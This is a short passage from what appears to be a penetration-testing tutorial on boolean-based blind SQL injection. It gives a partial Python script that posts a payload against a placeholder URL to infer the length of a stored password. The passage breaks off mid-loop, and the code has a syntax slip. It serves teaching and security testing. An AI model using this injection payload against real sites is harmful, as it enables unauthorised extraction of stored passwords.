Exploiting Boolean SQLi
There are times when all you can get from a page is a yes or no. It's heartbreaking until you realize that that's the SQL equivalent of saying I LOVE YOU. All SQLi can be broken down into yes or no questions, depending on how patient you are.
We will create a script that takes a yes value and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change, depending on the system you are testing.
How to do it…
The following script is how yours should look:
import requests
import sys
yes = sys.argv[1]
i = 1
asciivalue = 1
answer = []
print “Kicking off the attempt”
payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}
while True:
req = requests.post('<target url>' data=payload)
lengthtest = req.text
if yes in lengthtest:
length = i
break
else:
i =...
